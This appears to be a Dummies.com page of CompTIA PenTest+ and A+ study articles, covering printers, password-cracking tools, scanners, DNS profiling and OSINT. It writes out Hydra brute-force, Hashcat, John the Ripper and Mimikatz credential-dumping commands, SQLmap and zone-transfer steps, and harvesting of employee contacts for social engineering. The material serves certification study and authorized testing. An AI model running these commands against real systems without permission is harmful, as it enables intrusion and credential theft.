Glen Clarke

Cheat Sheet / Updated 03-08-2022

Welcome to the CompTIA PenTest+ Certification For Dummies online cheat sheet! Here, you'll find quick facts to remember on test day to help you answer questions found on the CompTIA PenTest+ certification exam. It includes some of the major concepts you need to know for the exam such as the phases of the penetration testing process, OSINT tools, exploitation tools, wireless cracking tools, Nmap command-line switches, and parts of the penetration test report.

Article / Updated 08-26-2021

The different types of printers in today’s busy world of computing are laser, inkjet, dot matrix, thermal, and virtual. You need to be familiar with each type for the compTIA certification A+ exams. Laser printers The laser printer — also known as a page printer because it prints one page at a time — is the most popular type of printer because it is fast and reliable, and offers the best-quality printout of the three types of printers. A laser printer gets its name because it uses a laser beam in the printing process. A laser printer, shown in the following figure, is also the most expensive type of printer because of its high-cost components such as the laser. Many parts work together to make the laser printer and its printing process run smoothly: Paper feeder mechanism: Laser printers use a set of pickup rollers to grab the paper from the paper tray and feed it into the printer. Paper transport path: Rollers are used throughout the print process so that the paper can continue to move through the printer. Registration rollers move the paper. Fuser rollers, also known as the fuser assembly, melt the toner onto the paper. Exit rollers guide the paper out of the printer. Toner cartridge: The toner cartridge (shown in the following figure) contains the replaceable components of the printing process. It contains three core components: The toner is electrically charged material made of pigment (to give it its color) and plastic (so it can be melted to the page) that is attracted to the paper to create the printout. The print drum, also known as the imaging drum, holds an electromagnetic charge when exposed to the laser. That charge then attracts the toner to the page. The cleaning blade cleans excess toner off the drum after the print process has completed. Power supply: The power supply in the printer is responsible for converting AC from the wall outlet into DC that charges the primary corona wire and transfer corona wire as well as with other components of the printer. Primary corona wire: The primary corona wire applies the initial –600V charge to the drum. Transfer corona wire: The transfer corona wire gives the paper a positive electrical charge that is used to attract the toner to the paper. Each component of the laser printer is used to perform the print operation. The process used to perform the printer operation is the laser printing process. The laser printing process The laser printing process has six phases, and you are required to know them for the A+ exams. Knowing the process is the basis for effective printer support and is essential for passing the A+ exams. The six phases of the laser printing process are conditioning, writing, developing, transferring, fusing, and cleaning. As you read the following sections, identify where each step occurs in the schematic shown. 1. Charging the drum (Conditioning) This phase is often known as the conditioning or charging phase. When the printer receives a command from the computer’s operating system to begin the print process, the primary corona wire applies a –600V charge to the photosensitive drum, also known as the print drum. This charge is one reason why a printer requires a high-voltage power supply. 2. Exposing the drum (Writing) This phase is often referred to as the exposing or writing phase. After the drum has the –600V charge, a laser beam is used to hit areas on the drum to create the image to be printed. In the areas on the drum that the laser touches, the charge changes from –600V to approximately –100V. Recognize that the areas exposed to the laser beam are more positively charged. 3. Developing the image (Developing) After the image is created on the photosensitive drum, toner is used to develop the image on the drum. Alongside the print drum is the developing roller. The developing roller has a –600V charge, which attracts the toner from the toner reservoir to the developing roller. Because the print drum and the developing roller are both charged to –600V (except for the areas of the print drum previously exposed to laser light), the toner from the developing roller is attracted to the –100V charged areas of the print drum. This entire concept is based on the “opposites attract” principle. Although both the drum and the roller are both negatively charged, –100V is more positive than –600V, so the toner on the –600V roller is attracted to –100V areas on the drum. Now that the print drum has toner on only the areas of –100V charge, the image is ready for transfer to paper. 4. Transferring the image (Transferring) After the toner is on the print drum, the feed rollers (also known as the registration rollers) feed the paper into the printer and over the transfer corona wire. The transfer corona wire, also known as the secondary corona wire, applies a very strong positive charge of +600V to the paper. The purpose of such a strong charge to the paper is to ensure that the toner will be attracted from the –100V areas of the drum to the paper. This, too, is based on the rule that opposites attract! The paper continues to move through the assembly, and passes over the drum to attract the toner from the drum to the paper. 5. Fusing the image (Fusing) After the paper moves past the print drum and holds the toner, the paper then moves through the fusing rollers, which melt the toner to the paper. The fusing rollers are needed because the only thing holding the toner to the paper at this point is a positive electric charge. During the fusing phase, the paper moves between a heated, Teflon-coated roller and a rubber roller, which melt the toner in place. The paper is then ejected from the printer. 6. Cleaning up the mess (Cleaning) After the printing has completed, any excess toner that remains on the print drum needs to be cleaned off. That’s the purpose of this last phase — the cleaning phase. A cleaning blade scrapes any leftover toner off the print drum and into a holding tray to prepare the drum for the next print operation. The A+ certification exams focus on laser printers when it comes to asking questions about printers. Be familiar with dot matrix and inkjet printers, but most of all, be sure that you are comfortable with laser printers and the laser printing process. Lab 4-1 will help you identify parts of the laser printer. You will need a laser printer available to perform this lab. Lab 4-1 can be found on the companion website at www.dummies.com/go/aplusaio. Inkjet printers Inkjet printers (see the following figure) offer the next highest level of print quality and are relatively cheap compared to laser printers. Inkjet printers are great for home use or small office environments that don’t have large print jobs. Inkjet printers don’t use toner like a laser printer; instead, they use ink cartridges. The ink cartridge contains all the working elements needed to get an image from the computer onto a sheet of paper. It contains compartments of ink, each sealed with a metal plate to prevent ink leakage. Each compartment has a tiny pinhole from which the ink is sprayed from the cartridge onto the paper. What’s interesting about ink cartridges is that each has its own integrated print head. The printer’s paper roller, feeder assembly, carriage, and belt are similar to these parts on other printer types. Nowadays duplexing (the ability for the printer to produce two-sided output) is pretty standard on most mid-level inkjet print devices. When the printer receives the command from the computer to print an image, the printer starts the print process by applying an electrical charge to the heating elements that are in the ink reservoir. The charge heats the heating elements, which cause the ink to vaporize. The vaporized ink creates pressure and is forced out the pinhole, creating a tiny bubble that hits the paper. Color inkjet printers are very popular today because of the increased popularity of digital cameras. Color inkjet printers can require two cartridges: one for black ink and one for the colors (cyan, yellow, and magenta). Most inkjet printers today have cartridges that bundle the black ink with the other colors. These cartridges are called CYMK (C for cyan, Y for yellow, M for magenta, and K for black). Some printer manufacturers offer individual cartridges for each color. The benefit of these printers is that if you run out of one color, you simply need to buy only the cartridge that contains that color, not all the colors. One thing to keep in mind is the print cartridges/print heads fall out of alignment on a regular basis. Therefore, you should make a habit of recalibrating the print output for any inkjet printers that you maintain. You should find that calibration utilities are built into the print device’s management software. When it is time to replace a spent ink cartridge, take the old cartridge with you to the store so that you know which cartridge type to buy. Some office supply stores can recycle your old cartridges, sometimes even offering a discount when you turn in your old cartridges. If you do not want to take the old cartridge with you to the store, make sure you know the make and model of the printer that you are buying the cartridge for. Multifunction printers Multifunction printers are laser or inkjet printers that incorporate other functions besides printing into a single hardware device. Typically, multifunction printers include scan and fax functionality, and are often WiFi-enabled both for infrastructure and ad-hoc wireless networks. And any multifunction printer worth its salt, like the HP OfficeJet Pro 6830 that I use in my office, support advanced printing features like duplex (two-sided) printing and collation. Many business-class multifunction laser or inkjet printers include an internal hard disk drive that the device uses to cache incoming print jobs. This hard drive caching allows the printer to service more print jobs per unit time than it could by using its much-more limited internal RAM. Dot matrix printers Dot matrix printers are considered impact printers because they physically strike an inked ribbon with a metal pin to put characters on paper. A dot matrix printer fires off rows of pins that strike the ribbon in patterns to create the image or characters that need to be printed. Each pin — a solenoid — is wrapped in a coiled wire held in place with a spring and small magnet. When a solenoid is needed to help create the image by striking the ribbon, an electrical charge is sent down the coil wire that surrounds the solenoid. The electrical charge around the wire causes the magnetic field from the magnet to be lost, resulting in the pin firing against the ribbon. The solenoids are contained in the print head, which moves across the paper printing one line of dots at a time. Originally, dot matrix printers used only nine pins in the print head. The 9-pin dot matrix printers were known as draft-quality printers and were later replaced by 17- and even 24-pin dot matrix printers. The quality of the 24-pin dot matrix was much better than that of the 9-pin because the greater number of dots creates a finer image. Thermal printers For the A+ exams, you simply need to focus on laser, dot matrix, and inkjet printers. Another type of printer you might encounter, though, is a thermal printer, which creates printouts on special paper by heating a stylus pen located on a print head. The pen then causes a chemical reaction on the special paper that is sensitive to heat. Virtual and cloud-based printers A virtual printer is a non-physical print device that exists on your local system. What do I mean, you ask? Well, I’m here to tell you that every time you use the Portable Document Format (PDF) printer with Adobe Acrobat, or the Microsoft XML Paper Specification (XPS) printer that is included with the Office productivity suite, you’re in fact using a virtual printer. A virtual printer exists entirely in software, and its sole purpose is to “print” output to a document or image file. Printing to a file or image is a great benefit to individuals and businesses who covet the so-called “paperless office.” By using virtual printers you not only contribute to the environment by consuming less paper, but you also save money on otherwise expensive consumables like inkjet and toner cartridges. By contrast, a cloud printer is a virtual printer whose device drivers and managed, well, in the cloud. Apple AirPrint and Google Cloud Print are two cloud printing technologies whose goal is to make it easier for you and others to print output from any print device without having to go through the trouble of installing a device driver. Here’s how cloud-based printing works: You connect your AirPrint- or Cloud Print–enabled printer to your WiFi network. Next, you choose the Print function from any application running on another host from the same WiFi network. The cloud printer should be available, and your print job will go through despite your not having manually loaded device drivers and/or configuration utilities. Pretty neat! For those of you who are concerned about security (and that should be all of you): As long as you have authentication enabled on your WiFi network, your cloud-based print queues should be safe from unauthorized parties. That said, the data privacy aspect is enough to scare many individuals and businesses away from any technology that mentions “cloud” in its name. 3D printers A 3D printer allows you to make three-dimensional solid objects from a digital blueprint file. The creation of the objects takes place by the printer laying down layer after layer of plastic filament until you have the completed object. 3D printers have a number of practical applications beyond the “maker” joy: product prototyping, scale models, proof of concept, and so forth. Common parts on the printer Whether you are using a laser printer, inkjet printer, or dot matrix printer, some parts are common to each of the printer types, although how they physically print is different. The following are some common elements to each printer type: Print head: The print head is responsible for the printing. With inkjets, the print head contains the nozzles that shoot out the ink, while a dot matrix print head contains the pins that shoot out. Heading element: The “thermal” in “thermal printer” denotes the necessity of a heating element. The element heats the ink that the print head affixes to your paper. Incidentally, thermal printers require special thermal paper, so stock up! Feeder: The feed assembly is responsible for picking up the paper from the paper tray and feeding the paper into the printer. Roller: Many printers have rollers to move the paper through the printer. Duplexing assembly: The duplexing assembly is responsible for allowing automatic printing on both sides of the page. The duplex assembly can be added to many printers to obtain automatic duplexing capabilities. Carriage and belt: The carriage-and-belt system is the part of the printer that moves the print head back and forth across the page. Paper tray: The paper tray holds the paper while it is waiting to be picked up and sent through the printer.

Article / Updated 03-23-2021

The second category of pentesting tools that appears in the CompTIA PenTest+ objectives is credential testing tools. Credential testing tools help you crack passwords for user accounts on a system. There are a number of password cracking tools out there, but these are the tools the PenTest+ exam wants you to be familiar with. Hashcat Hashcat is a common password-cracking tool used to crack the hashes on passwords. Hashcat can crack hashes from a number of different hashing algorithms, including MD5, SHA1, and more. Hashcat can use dictionary attacks and brute-force attacks to crack the password hashes. For example, you could use the following command: hashcat -m 0 -a 0 -o output.txt target_hashes.txt /usr/share/wordlists/rockyou.txt Where: -m 0 specifies the hash mode. 0 means MD5, while 100 is SHA1. -a 0 specifies the attack mode. 0 means a dictionary attack. -o specifies the output file to write the cracked passwords to. In this example, I used txt. txt is the file that contains the hashes to be cracked. txt is the dictionary list file that comes with Kali Linux. You can view the many parameters of Hashcat and their possible values by typing hashcat -h in a Linux terminal. Medusa and Hydra Medusa and Hydra are also password-cracking tools included with Kali Linux you can use to crack passwords. Medusa is a fast password-cracking tool that can encapsulate the password attack into different protocols, such as HTTP, FTP, IMAP, MSSQL, POP3, SMTP, TELNET, SSH, and many more. For Medusa on Kali Linux, use the following command: medusa -h 192.168.1.3 -u admin -P rockyou.txt -M ssh This command will try to crack the password for a user known as admin on system 192.168.1.3 using SSH as the protocol and the password list file of rockyou.txt. Hydra is a password-cracking tool that can encapsulate the attack inside many protocols as well, such as FTP, HTTP, HTTPS, LDAP, MS-SQL, MySQL, RDP, POP3, SMB, SSH, and many more. Notice that you can use it to crack passwords over RDP. So you could use Nmap to discover all systems on the network running RDP and then use Hydra to attempt to crack the admin password. For example, use this command to detect systems with RDP on the network: nmap -sS 192.168.1.0/24 -p 3389 Once you have discovered the systems running RDP, you can then try to crack the passwords with the following command (assuming 192.168.1.3 is one of the systems): hydra -l administrator -P rockyou.txt rdp://192.168.1.3 Where: -l is the name of the user account to crack. Note you can use -L instead with a text file containing a list of users. -P specifies the password list file to use. In this example I used txt. Rdp://192.168.1.3 is the system we want to crack the password on. Note the URL starts with the protocol. If you want to crack the password over FTP or HTTP, you would simply start the URL with those protocols. Hydra can be used to crack passwords using many different internet protocols; for example, you can use Hydra to brute force into a website using HTTP or HTTPS. In the following example, I demonstrate how to use Hydra to crack the login DVWA site that is running on the Metasploitable2 VM: 1. Ensure the Kali Linux and Metasploitable2 VMs are running, run ifconfig on each, and record the IP address: Kali Linux: __________________ Metasploitable2: _____________ 2. On Kali Linux, launch a browser and type http://<ip_metasploitable2>. 3. Choose the DVWA link. 4. Right-click on the page and choose Inspect Element. You should now have the web page and the HTML source code shown on the screen. 5. In the bottom half of the screen, choose the Network tab to monitor network traffic as you try to logon to the site. 6. In the main logon screen, type your name in the Username and Password textboxes and then choose the Login button. You will notice that your login fails (on the web page under the Login button), but you will also see on the Network tab that the page was posted to login.php. 7. Select the login.php POST method line (see the following figure). On the right you can see the details of the request (Header, Cookies, Params). 8. Choose the Edit and Resend button in order to recreate the HTTP post request message and gather information that Hydra needs to perform the password attack. Hydra needs the hostname or IP address, the login page URL, the request body, and the error message. Record the information: Host/IP: ______________________________________________ Login page (Referer without host/IP): ______________________ Request body: _________________________________________ Error message: _________________________________________ In my example, I recorded the following information: Host/IP: 192.168.67.137 Login page (Referer without host/IP): /dvwa/login.php Request body: username=glen&password=glen&Login=Login Error message: Login failed (error shown on page) 9. Next, replace the actual username and password with variables of ^USER^ and ^PASS^ as shown below: Host/IP: 192.168.67.137 Login page (Referer without host/IP): /dvwa/login.php Request body: username=^USER^&password=^PASS^&Login=Login Error message: Login failed (error shown on page) Note that ^USER^ and ^PASS^ are variables, which means that for every username and password read from a user list file and password list file, those words will be placed in those variables in order to try a large number of usernames and passwords from the one command. 10. Now that we have all of the information, Start a terminal session in Kali Linux. 11. Enter the following Hydra command to attempt to crack the login page of the site: hydra -L userlist.txt -P passlist.txt <host_IP> http-post-form “<login_page>:<request_body>:<error_message>” Note that: -L refers to a text file containing a list of users. -P specifies the password list file to use. <host_IP> refers to the IP or hostname of the website. http-post-form is the method to use to perform password attack. <login_page> refers to the URL of the login web page. <request_body> refers to the username and password parameters. <error_message> is the error message that was displayed on the page when the login failed. In my example, this is the command I executed to perform the password attack on the DVWA site: hydra -L userlist.txt -P passlist.txt 192.168.67.137 http-post-form “/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login Failed” If a username and password are found, you will see them displayed on the screen, as shown. Note that if you would like to see the actual username and passwords that are attempted display on the screen while the attack is occurring, you can add -V to the end of the command like this: hydra -L userlist.txt -P passlist.txt 192.168.67.137 http-post-form “/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login Failed” -V For the PenTest+ certification exam, remember that Hashcat, Medusa, and Hydra are all examples of password-cracking tools available on Kali Linux. CeWL CeWL, short for Custom Word List generator, is a unique credential-cracking tool in the sense that it is used to generate a text file containing potential passwords by crawling through a site. You could use the following command to generate a wordlist file: cewl -d 2 -m 5 -w words.txt http://www.yourcustomer.com Where: -d 2 specifies the depth in the site to go. Here we are going two links deep. -m 5 specifies the minimum length of characters in the words picked up. -w specifies the file to write the list of potential passwords to. John the Ripper John the Ripper is a multiplatform password-cracking tool that runs on platforms such as Windows and Linux, and can crack passwords stored in different hash forms such as MD5 and SHA. The John package that comes with Kali Linux includes a number of tools such as: mailer: The mailer command is used to email users who have their passwords cracked. john: The john command is the John the Ripper password-cracking tool. unafs: The unafs command is used to warn users about their weak passwords. If you have the passwords in a file, you can attempt to crack those passwords with the following command: john --format=raw-md5 target_hashes.txt Where: --format specifies the type of hash values being cracked (MD5 in my example). target-hashes.txt specifies the text file containing the list of hashes. In this figure you can see that I ran John the Ripper against a file called target_hashes.txt and it was able to crack two of the passwords: Password and HELLO. You can also use a wordlist file with John the Ripper to perform a dictionary attack on the password list using the following command: john --format=raw-md5 --wordlist rockyou.txt target_hashes.txt Cain and Abel Cain and Abel is an older password-cracking tool that has a number of features. It can easily capture traffic on the network and then discover passwords that are sent in clear text. It can also be used to crack many different types of passwords, such as MD5 hashes, Cisco hashes, Windows passwords, and password-protected files. Mimikatz Mimikatz is a post-exploitation tool available in Kali Linux that is used to steal passwords off a Windows system after the system has been exploited. The tool steals the passwords by locating passwords stored in memory on the exploited system and aids in gaining access to other systems on the network. Prior to Windows 10, Windows would load the encrypted passwords into memory with a feature called WDigest and the secret key to decrypt the passwords. Mimikatz leverages this and is able to decrypt the passwords. In Windows 8.1, Microsoft added the capability to disable the WDigest functionality, and it is disabled by default in Windows 10. However, after compromising a system, you could enable it again. To use Mimikatz after you have exploited a system, you can use the commands shown here: mimikatz # <strong>privilege::debug</strong> Privilege ‘20’ OK Note that the first command is to verify that you have the privileges to run the command (you must be an administrator to run Mimikatz). If you receive a return status code of Privilege '20' OK, then you are an administrator. Next, we load the Sekurlsa module for Mimikatz, which will retrieve the passwords from memory: mimikatz # sekurlsa::logonpasswords As output you will receive a list of usernames found in memory with the LM hash, the NTLM hash, and the SHA1 hash of the passwords, as well as information such as the username, domain name, and the password in plain text. For the PenTest+ certification exam, know that John the Ripper and Cain and Abel are password-cracking tools. Also know that Mimikatz is a post-exploitation tool that can be used to steal passwords after gaining administrative access to the system. patator and DirBuster Two additional password-cracking tools to be familiar with are Patator and DirBuster. Patator is a password-cracking tool that is used to crack passwords given the hash values of the password, while DirBuster is an Open Web Application Security Project (OWASP) designed to locate directory and filenames on a web server.

Article / Updated 03-23-2021

The first category of tools that appears in the CompTIA PenTest+ objectives is scanners. A number of different types of scanners exist—some scanners will scan for open ports, while other scanners are designed to find vulnerabilities within a system. Nmap Nmap is a common network scanner used by pentesters to locate systems on the network and determine the ports that are open on those systems. You can also use Nmap to identify the software running on the ports and the type of operating system being used. You need to know the Nmap syntax for the PenTest+ certification exam! Nikto and w3af Nikto is an open-source web application vulnerability scanner. When you run it against a website or web application, Nikto performs a number of tests to determine if the web application is vulnerable to different types of attacks. To perform a Nikto scan against a system, you would use the following command: nikto -h <IP_or_FQDN> For example, to perform a web vulnerability scan on the system with the internet protocol (IP) address 192.168.1.3, you could use the command, nikto -h 192.168.1.3, as shown. If the web application was using SSL, you could use the following command to scan a HTTPS site: nikto -h 192.168.1.3 -ssl. Another example of an open-source web application vulnerability scanner is w3af, which is labeled as a web application attack and audit framework to assess the security of your web servers. You can download w3af, or it comes preinstalled on Kali Linux where you can access it from Applications | Web Application Analysis. With w3af you can select the different types of vulnerabilities to check for by selecting the appropriate plugins and then starting the scan. Note that the CompTIA objectives list w3af under the credential testing tools, but I have placed it in the “Scanners” section as that is what the tool is best known for. Nessus Nessus is a commercial tool used for vulnerability scanning of systems on the network. Not only will Nessus scan for a wide range of vulnerabilities, but it will also scan a number of different types of devices for those vulnerabilities. Nessus also offers a downloadable free edition that is limited to scanning 16 devices, which is a perfect learning tool! OpenVAS OpenVAS is an open-source vulnerability scanner. OpenVAS can perform the vulnerability scan in a number of different ways, including authenticated and unauthenticated testing. SQLmap SQLmap is a program you can download to help automate SQL injection attacks against the web application you are authorized to test in your penetration test. SQLmap comes preinstalled on Kali Linux. If you want to perform an automated test with SQLmap, you need to pass in the URL to be tested, such as sqlmap -u http://192.168.1.3/product.php?id=5. This means the request to the page accepts parameters as input, and SQLmap will try a number of malicious input on the ID parameter. For the PenTest+ certification exam, remember that Nikto is a web application vulnerability scanner; SQLmap is an automated SQL injection attack tool; and Nessus is a system vulnerability scanner used to identify weaknesses in a product.

Article / Updated 03-22-2021

Active information gathering for a pentest involves polling the target systems to find out about the systems that are up and running, the ports that are open, and the software being used. This involves communicating with the systems and potentially being detected. For the PenTest+ certification exam, remember the difference between active and passive information gathering. Active information gathering involves engaging with the target environment, such as via scans, while passive information gathering involves using public internet resources to discover information about the target without being detected. Many of the active information gathering techniques involve scanning target systems to find out things like the operating system that is running and the services running on the system. Domain name system (DNS) profiling involves sending queries to DNS servers to retrieve information on the systems that might exist within the company, such as a mail server or a web server. Keep in mind that in passive information gathering you were able to obtain the DNS server information for a company by doing a Whois lookup. The next step is to send queries to those servers to find out what DNS records exist. You can use a number of tools to perform DNS profiling. The two most common are the commands nslookup and dig. nslookup nslookup is a TCP/IP command in Windows and Linux that allows you to query DNS servers for different types of DNS records. You can use nslookup as a command or as an interactive prompt where you type nslookup commands into the prompt. Here is an example of using nslookup as a regular command to retrieve the internet protocol (IP) address of a host: nslookup www.wiley.com In the following figure, you can see the address of the DNS server you have sent the query to at the top of the output, and at the bottom of the output, you can see the IP addresses of the fully qualified domain name (FQDN) of www.wiley.com. In this example, four IP addresses answer the FQDN. With nslookup you can also do things like specify you want to see the email servers for a company by setting the type of query to MX (mail exchange) records. To do this, use the following commands: nslookup set type=MX wiley.com In the following figure, you can see the output of the command. It looks like wiley.com has four mail servers. When performing the pentest, you would document the four FQDNs of the mail servers and then resolve those to IP addresses by using nslookup <fqdn>. As one final example, you can try to retrieve all of the DNS records for a particular company by doing a DNS zone transfer. DNS zone transfers should be controlled by the server administrators, so if you are successful, you definitely want to make a note of it and add it to your remediation list in the pentest report. To attempt a zone transfer from Windows using nslookup, use these commands: nslookup server <ip_or_fqdn_of_company_DNS_server> set type=all ls -d <company_domainname> Keep in mind you would have retrieved the DNS server information from the Whois lookup you performed during your passive information gathering earlier. Pretending the DNS server is 192.168.1.1 for wiley.com (which it is not), you could use the following commands to do a zone transfer: nslookup server 192.168.1.1 Set type=all ls -d wiley.com dig dig, which is short for Domain Information Gopher, is a command in Linux used to perform DNS profiling. I like the output of dig a bit better than the output of nslookup because I think it's easier to read. To find out the IP address of www.wiley.com, type the following command on a Kali Linux machine: dig www.wiley.com Notice in this figure that the question section is seeking information about the IP address of www.wiley.com, and the answer section is listing the four IP addresses associated with it. What I like about dig as a command is that you can ask for the short version of the output by adding +short to the command. For example: dig www.wiley.com +short Notice that the output in the following figure is much cleaner than the output shown in the preceding figure, and the IP addresses stand out right away. If you want to use dig to retrieve specific records, such as MX records to find out the email servers for a company, you could use the following command: dig wiley.com MX You could also clean up the output by adding +short to that command: dig wiley.com MX +short This figure displays the output of using dig to find the MX records. If you want to do a zone transfer with dig to attempt to retrieve all of the DNS records that exist, you could use the following dig command: dig wiley.com axfr You may notice that you do get a few records that identify the DNS servers for the company (NS) and also a few host records (A); however, you may also notice that at the bottom of the output it says “Transfer Failed.” This is because the server administrators for that company are blocking full zone transfers as it exposes too much information to the hacker. If you are testing a company and zone transfers are not refused, you want to be sure to document that in your pentest report. For the PenTest+ certification exam, know that dig and nslookup are two tools that can be used to perform DNS profiling to help identify hosts that exist within an organization.

Article / Updated 03-22-2021

When you are conducting a penetration test, it is important to take a methodological approach to information gathering and divide the task up into two parts: passive information gathering and active information gathering. Passive information gathering should come first. It involves collecting public information from the internet about the company being assessed — without invoking any kind of communication with the target systems. Passive information gathering involves using internet resources to find out publicly available information about the company that could help you exploit the company’s systems and bypass security controls while performing the pentest. There are different techniques to passive information gathering: you could surf public internet sites manually, query DNS, or use open-source intelligence (OSINT) gathering tools to automate the discovery of information. Most of these techniques are not technical in nature, but they do represent the mindset of a hacker, so you want to follow similar strategies when performing your pentest. Open-source intelligence gathering The term used for discovering information from public data sources available on the internet is open-source intelligence (OSINT) gathering. Through OSINT gathering, you can collect information about a company from the company’s website, social media sites, domain name system (DNS) information, blogs, and so on. The goal of OSINT gathering is to gather information such as contact names, email addresses, DNS records to aid in the penetration test. Browsing internet resources The first technique to use when information gathering is to surf the company website for information that could aid in an attack, such as software the company is using or email addresses and phone numbers of company employees that you could use in a social engineering attack. Look for web pages, such as About Us, Job Postings or Careers pages, that could offer information like names, phone numbers, and email addresses of employees or upper management. This is great information to use in a social engineering attack. In addition, a Job Postings or Careers page may list active jobs that could help you understand the technologies the company is using. For example, if the company is looking for an Exchange Server 2016 Messaging Administrator, then you know the company is most likely running Exchange Server 2016. For the PenTest+ certification exam, know that you can use tools such as the popular wget in Linux or the BlackWidow utility for Windows to copy the contents of a website to a local folder on your system so that you can leisurely review the contents offline. Using Google hacking Google hacking is the term used for an information gathering technique in which specific keywords are used to search Google or other search engines for specific information on the internet. Here are a few of the Google keywords you should be familiar with that I find quite useful: site: : The site keyword is used to search a specific website for a keyword. For example, if you are performing a security test for the Wiley publishing company, you could use site: www.wiley.com password to locate the login pages on the Wiley website. This could be useful if you wanted to test Wiley’s login pages against SQL injection attacks. intitle: : You can use the intitle keyword to search the title of a page for specific keywords. For example, if you want to find web pages that contain the word “intranet” in the title, you could use intitle: intranet. inurl: : The inurl operator will search the keyword given in the URLs found in the Google database. For example, if you want to locate sites that have the word “intranet” in the URL, you could use inurl: intranet. intext: : The intext operator searches a web page for specific text. For example, if you want to search my company site for pages that contain the word “video,” you could use site: dcatt.ca intext: video. filetype: : One of my personal favorites is the filetype operator, which you can use to find results containing a specific file type. For example, you could search the internet for sample penetration reports by filetype: pdf penetration test report. Referencing online cybersecurity sources In addition to browsing internet resources and using Google hacking to conduct your passive information gathering, research from many official sources is available for OSINT gathering, especially in the realm of cybersecurity information. You should be familiar with the following sources of cybersecurity information for the PenTest+ certification exam: CERT: Short for Computer Emergency Response Team, there are many CERT groups available worldwide that share cybersecurity information. Example CERT groups are the US CERT group and the Canadian version. JPCERT: The PenTest+ certification exam makes special mention to JPCERT, which is the Japan CERT group used to share information on cybersecurity. You can visit the JPCERT NIST: The National Institute of Standards and Technology (NIST) is a standards organization that develops a number of documents related to cybersecurity known as special publication (SP) documents. For example, SP 800-115 is a guide to security testing and assessments, while SP 800-17 is a guide to risk management. There are a number of SP documents well worth reading. CAPEC: The Common Attack Pattern and Enumeration Classification (CAPEC) is an information resource provided by a company called MITRE that identifies and documents attack patterns. The MITRE site also provides information on mitigation techniques for the attacks. Full disclosure: You can subscribe to mailing lists that share information related to vulnerabilities and exploitation techniques known as full disclosure lists. CVE: The Common Vulnerabilities and Exposures (CVE) list is responsible for identifying known vulnerabilities by their name, number, and description. CWE: The Common Weakness Enumeration (CWE) list is a list of common weaknesses found in software and the mitigation techniques used to protect against those weaknesses. Passive information-gathering tools In addition to using Google or surfing the company website, you can use a number of passive OSINT tools to help collect such company information as contact names, email addresses, DNS information, and internet protocol (IP) addresses. Whois Whois is a widely used database search tool used to discover domain name information and IP address information about a company. The domain name information sometimes contains important contact information of senior IT professionals that you can use in a social engineering attack, while the IP information is the public IP addresses purchased by the company. Having this information handy will aid in the next phase of the pentest — discovering active hosts. A number of Whois databases that you can search are available online. For example, you could go to www.godaddy.com/whois to perform a search, or you could go to www.networksolutions.com/whois, which is shown in the following figure. What is cool about the Network Solutions search page is you can search by domain name or IP address. Note that with the Whois lookup, you can collect information, like the organization’s name, the DNS servers hosting the DNS data, and sometimes contact information, such as email addresses and phone numbers of company employees. Many people are now using private registration with their domain registration information, which helps protect the personal information by obfuscating the information that is displayed with Whois lookups. You can also use Whois programs to discover domain name and IP address information. For example, Kali Linux comes with a Whois program you can execute from a terminal with the following command: whois wiley.com Another site with detailed Whois information is ARIN. When search results come back, choose the handle. You can then see the public IP addresses that are used by that organization. theHarvester theHarvester is a program in Kali Linux that you can use to perform passive information gathering to collect information such as employee names, email addresses, and subdomains, and discover hosts owned by the organization. You can use it to collect public information from Google, LinkedIn, Twitter, and Bing. The following command searches LinkedIn users for Wiley: theharvester -d wiley.com -b linkedin To collect information from all sources such as Google, LinkedIn, and Twitter, use the following command: theharvester -d wiley.com -b all -l 100 In this example, shown in the following figure, I limited the results to 100. Shodan Shodan is a search engine that collects information about systems connected to the internet, such as servers and internet of things (IoT) devices. To use Shodan, you need to register with a free account and then you can search the company or organization being assessed. When you perform a search in Shodan, you get a list of the target company’s publicly available servers and devices along with the IP address, the services running, and the ports that are open on that system. When you view the details for that system, you can get a list of its vulnerabilities. A map view shows the physical location of those servers as well. Maltego Maltego is OSINT software that shows a graphical representation of relationships between people, groups, webpages, and domains by analyzing online resources like Facebook, Twitter, DNS, and Whois information. For example, you could create a graphic and add a website address to the graphic, then use Maltego to search for additional information. This could be Whois information, phone numbers, location information, and email addresses associated with that website, and then you can have them added to the graph. Recon-ng Recon-ng is an OSINT tool built into Kali Linux that allows you to retrieve information like contact names, email addresses, DNS information, IP address information, and the like. Recon-ng is not as easy to use as theHarvester because it uses the module concept similar to the Metasploit framework, a modular penetration testing platform based on Ruby. Let’s take a look at an example of Recon-ng you can use on Kali Linux. To start Recon-ng and add a workspace, use the following commands (a workspace represents a project you are working on): recon-ng workspaces add wiley Now let’s add the domain names and company names to the Recon-ng database tables so that it uses them when performing all of the information gathering with future commands we use: add domains wiley.com add domains www.wiley.com add domains dummies.com add domains www.dummies.com add companies Wiley~A publishing company add companies Wiley Publishing~A publishing company add companies ForDummies~A Wiley product line To view the domains and company tables that have been populated, use these commands: show companies show domains The Recon-ng tool has modules that you use to collect the different types of information from online resources. Next, let’s collect the points of contact from Whois databases: use recon/domains-contacts/whois_pocs run Now, let’s discover other domain names and hosts on the internet related to the company by using a Bing search and a Google search: use recon/domains-hosts/bing_domain_web run use recon/domains-hosts/google_site_web run After running these commands, you can see the contact names and email addresses listed in the terminal, but it would be nice to output the information to a web page that you could use for a report. The following commands will load the reporting module and specify the creator of the report, the customer, and the report filename to generate: use reporting/html set CREATOR 'Glen E. Clarke' set CUSTOMER 'Wiley Publishing' set FILENAME /root/Desktop/Wiley_recon.html run If you open the HTML file on your desktop by double-clicking it, you will see a report similar to the report shown in the following figure. Keep in mind that if we would have used other modules to collect additional information (such as the IP ranges), that information would have been included in the report as well. Again, this is just a small example; know that there are a number of recon-ng modules that enable you to do things like view social media posts by an IP address. Censys Censys is another browser-based search engine that identifies hosts on the internet for a particular organization. In addition to identifying the hosts, Censys will also identify the services and ports that are open on those systems. FOCA Fingerprinting Organizations with Collected Archives (FOCA) is a tool used to scan documents to collect metadata that is typically hidden from the user. Some examples of document types that can be scanned by FOCA to extract the metadata are Microsoft Office files, Open Office files, and PDF files. For the PenTest+ certification exam, remember that Whois, theHarvester, Maltego, Recon-ng, and Censys are all tools used for OSINT gathering.

Article / Updated 03-22-2021

